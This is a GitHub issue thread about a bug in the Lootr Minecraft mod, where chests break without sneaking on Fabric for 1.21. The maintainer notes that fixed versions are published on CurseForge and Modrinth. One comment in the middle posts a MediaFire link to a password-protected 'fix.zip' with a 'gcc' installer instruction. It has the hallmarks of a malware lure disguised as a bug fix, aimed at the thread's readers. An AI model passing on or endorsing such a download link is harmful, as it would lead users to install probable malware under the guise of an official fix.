### ISSUE TITLE
[Bug] Able to break chests without sneaking

### ISSUE THREAD

**Issue by WingFrosty** [noobanidus/Lootr#459]
Notification about breaking chest appears but chest is broken anyway without sneaking.

Mod Version: 1.10.33.78
Loader: Fabric
Minecraft Version: 1.21

Mods Installed:
Fabric API
Mod Menu
Lootr

![image](https://github.com/user-attachments/assets/9cd67e89-12c3-4fb9-9ac5-d344432f7de3)

**Comment by itbear-shu** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by noobanidus** [comment]
New versions published to CurseForge and Modrinth which should fix this.
